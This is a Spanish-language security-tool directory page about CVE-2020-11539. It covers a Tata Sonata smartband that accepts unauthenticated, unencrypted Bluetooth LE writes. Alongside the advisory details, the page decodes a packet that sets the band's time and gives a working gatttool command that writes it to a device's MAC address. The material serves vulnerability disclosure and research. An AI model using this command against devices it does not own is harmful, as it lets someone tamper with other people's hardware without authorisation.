Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-11539 — Control de acceso inadecuado en Tata Sonata Smartband | Kitploit
Herramientas/GitHubGitHub/the-girl-who-lived/cve-2020-11539
Seguridad BluetoothSeguridad IoTAnálisis de VulnerabilidadesExplotaciónSeguridad InalámbricaSeguridad de Hardware e IoT
GitHubthe-girl-who-lived/cve-2020-11539

CVE-2020-11539

Control de acceso inadecuado en Tata Sonata Smartband

Ver Repositorio
11hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-11539: Control de acceso inadecuado en Tata Sonata Smartband

Información

Descripción: Se ha identificado que la smart band no tiene emparejamiento (nivel de seguridad BLE modo 0). Los datos transmitidos por el aire no están cifrados. Además, los datos enviados a la smart band no cuentan con autenticación ni verificación de firma, lo que permite a cualquier atacante controlar los parámetros del dispositivo inteligente.

Versiones Afectadas: Smart SF Rush - 1.12

Investigador: Sayli Ambure (https://twitter.com/sayli_ambure)

Enlace CVE de MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539

Exploit de Prueba de Concepto

Descripción

El siguiente paquete fue invertido y se descubrió que sirve para cambiar la hora; se pueden invertir más paquetes extrayendo el volcado hcisnoop de tu teléfono.

  1. Valor de datos: 00870e00141401060712052b051e

    Volcado hexadecimal de datos:00870e00141401060712052b051e
    Decimal de datos:00135140020200106071805430530
  • 00 87: Cabecera del paquete

  • 0e 00: Tipo del paquete

  • 14 14: Año en hexadecimal (2020)

  • 01 06: Mes y día (6 de enero)

  • 07 12: Hora y minuto en hexadecimal (07:18 a. m.)

  • 05 : Segundos

  1. Envía el siguiente comando de Gatttool para controlar la hora de la smart band:

gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e

Video de Prueba de Concepto:

Descargar herramienta